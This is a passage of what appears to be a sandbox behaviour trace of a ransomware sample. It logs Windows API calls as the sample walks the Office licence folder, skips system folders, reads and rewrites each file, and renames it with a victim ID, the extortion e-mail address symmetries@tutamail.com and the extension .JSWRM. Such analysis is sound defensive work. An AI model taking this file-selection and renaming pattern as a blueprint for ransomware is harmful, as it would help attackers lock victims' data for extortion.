lpMultiByteStr="ProPlusR_OEM_Perp3-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0109.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c010 | out: hHeap=0x1e0000) returned 1 [0109.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0109.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0109.055] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.055] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235d38 [0109.055] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp3-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp3-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.055] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11596) returned 1 [0109.055] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.056] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24c1d0 [0109.056] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d40, lpOverlapped=0x0) returned 1 [0109.102] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.103] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d40, lpOverlapped=0x0) returned 1 [0109.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.103] CloseHandle (hObject=0x45c) returned 1 [0109.103] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0109.103] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.103] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0109.103] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.103] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0109.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0109.103] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.103] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0109.103] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0109.103] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0109.103] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0109.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0109.103] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0109.103] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp3-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp3-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp3-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp3-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.105] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0109.105] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0109.105] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0109.105] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0109.105] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0109.105] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea341107, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea341107, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea3b3820, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4de5, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusR_OEM_Perp3-ul-phn.xrm-ms", cAlternateFileName="PR408F~1.XRM")) returned 1 [0109.105] lstrcmpiW (lpString1="ProPlusR_OEM_Perp3-ul-phn.xrm-ms", lpString2=".") returned 1 [0109.105] lstrcmpiW (lpString1="ProPlusR_OEM_Perp3-ul-phn.xrm-ms", lpString2="..") returned 1 [0109.105] lstrcmpiW (lpString1="ProPlusR_OEM_Perp3-ul-phn.xrm-ms", lpString2="...") returned 1 [0109.105] lstrcmpiW (lpString1="ProPlusR_OEM_Perp3-ul-phn.xrm-ms", lpString2="windows") returned -1 [0109.105] lstrcmpiW (lpString1="ProPlusR_OEM_Perp3-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0109.105] lstrcmpiW (lpString1="ProPlusR_OEM_Perp3-ul-phn.xrm-ms", lpString2="perflogs") returned 1 [0109.105] lstrcmpiW (lpString1="ProPlusR_OEM_Perp3-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0109.105] lstrcmpiW (lpString1="ProPlusR_OEM_Perp3-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.105] lstrcmpiW (lpString1="ProPlusR_OEM_Perp3-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0109.105] lstrcmpiW (lpString1="ProPlusR_OEM_Perp3-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0109.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0109.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp3-ul-phn.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0109.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0109.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp3-ul-phn.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d260, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_OEM_Perp3-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0109.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0109.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0109.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp3-ul-phn.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0109.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0109.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp3-ul-phn.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22cdc8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_OEM_Perp3-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0109.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0109.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0109.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0109.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0109.106] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp3-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp3-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.107] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19941) returned 1 [0109.107] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4de0) returned 0x24c1d0 [0109.107] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4de0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4de0, lpOverlapped=0x0) returned 1 [0109.110] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.110] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4de0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4de0, lpOverlapped=0x0) returned 1 [0109.110] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.110] CloseHandle (hObject=0x45c) returned 1 [0109.110] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0109.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.110] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0109.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.110] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0109.110] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0109.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.110] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0109.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.110] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0109.110] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0109.110] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0109.110] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0109.110] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0109.110] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp3-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp3-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp3-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp3-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0109.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0109.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0109.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0109.111] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0109.111] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea2f4c6f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea2f4c6f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea3673f2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2997, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusR_OEM_Perp4-pl.xrm-ms", cAlternateFileName="PR2837~1.XRM")) returned 1 [0109.111] lstrcmpiW (lpString1="ProPlusR_OEM_Perp4-pl.xrm-ms", lpString2=".") returned 1 [0109.112] lstrcmpiW (lpString1="ProPlusR_OEM_Perp4-pl.xrm-ms", lpString2="..") returned 1 [0109.112] lstrcmpiW (lpString1="ProPlusR_OEM_Perp4-pl.xrm-ms", lpString2="...") returned 1 [0109.112] lstrcmpiW (lpString1="ProPlusR_OEM_Perp4-pl.xrm-ms", lpString2="windows") returned -1 [0109.112] lstrcmpiW (lpString1="ProPlusR_OEM_Perp4-pl.xrm-ms", lpString2="recovery") returned -1 [0109.112] lstrcmpiW (lpString1="ProPlusR_OEM_Perp4-pl.xrm-ms", lpString2="perflogs") returned 1 [0109.112] lstrcmpiW (lpString1="ProPlusR_OEM_Perp4-pl.xrm-ms", lpString2="documents and settings") returned 1 [0109.112] lstrcmpiW (lpString1="ProPlusR_OEM_Perp4-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.112] lstrcmpiW (lpString1="ProPlusR_OEM_Perp4-pl.xrm-ms", lpString2="system volume information") returned -1 [0109.112] lstrcmpiW (lpString1="ProPlusR_OEM_Perp4-pl.xrm-ms", lpString2="msocache") returned 1 [0109.112] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0109.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp4-pl.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0109.112] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0109.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp4-pl.xrm-ms", cchWideChar=28, lpMultiByteStr=0x241290, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_OEM_Perp4-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0109.112] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0109.112] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0109.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp4-pl.xrm-ms", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0109.112] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0109.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp4-pl.xrm-ms", cchWideChar=28, lpMultiByteStr=0x240fe8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_OEM_Perp4-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0109.112] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0109.112] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0109.112] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0109.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.112] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.112] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0109.112] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp4-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp4-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.113] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10647) returned 1 [0109.113] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2990) returned 0x24c1d0 [0109.113] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2990, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2990, lpOverlapped=0x0) returned 1 [0109.115] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.115] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2990, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2990, lpOverlapped=0x0) returned 1 [0109.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.115] CloseHandle (hObject=0x45c) returned 1 [0109.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0109.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0109.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0109.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0109.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0109.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0109.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0109.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dcb0 [0109.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0109.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0109.116] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp4-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp4-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp4-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp4-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dcb0 | out: hHeap=0x1e0000) returned 1 [0109.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0109.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0109.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0109.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0109.117] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea25c28b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea25c28b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea2f4c6f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5eef, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusR_OEM_Perp4-ppd.xrm-ms", cAlternateFileName="PR0AF9~1.XRM")) returned 1 [0109.117] lstrcmpiW (lpString1="ProPlusR_OEM_Perp4-ppd.xrm-ms", lpString2=".") returned 1 [0109.117] lstrcmpiW (lpString1="ProPlusR_OEM_Perp4-ppd.xrm-ms", lpString2="..") returned 1 [0109.117] lstrcmpiW (lpString1="ProPlusR_OEM_Perp4-ppd.xrm-ms", lpString2="...") returned 1 [0109.117] lstrcmpiW (lpString1="ProPlusR_OEM_Perp4-ppd.xrm-ms", lpString2="windows") returned -1 [0109.117] lstrcmpiW (lpString1="ProPlusR_OEM_Perp4-ppd.xrm-ms", lpString2="recovery") returned -1 [0109.117] lstrcmpiW (lpString1="ProPlusR_OEM_Perp4-ppd.xrm-ms", lpString2="perflogs") returned 1 [0109.117] lstrcmpiW (lpString1="ProPlusR_OEM_Perp4-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0109.117] lstrcmpiW (lpString1="ProPlusR_OEM_Perp4-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.117] lstrcmpiW (lpString1="ProPlusR_OEM_Perp4-ppd.xrm-ms", lpString2="system volume information") returned -1 [0109.117] lstrcmpiW (lpString1="ProPlusR_OEM_Perp4-ppd.xrm-ms", lpString2="msocache") returned 1 [0109.117] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0109.117] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp4-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0109.117] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 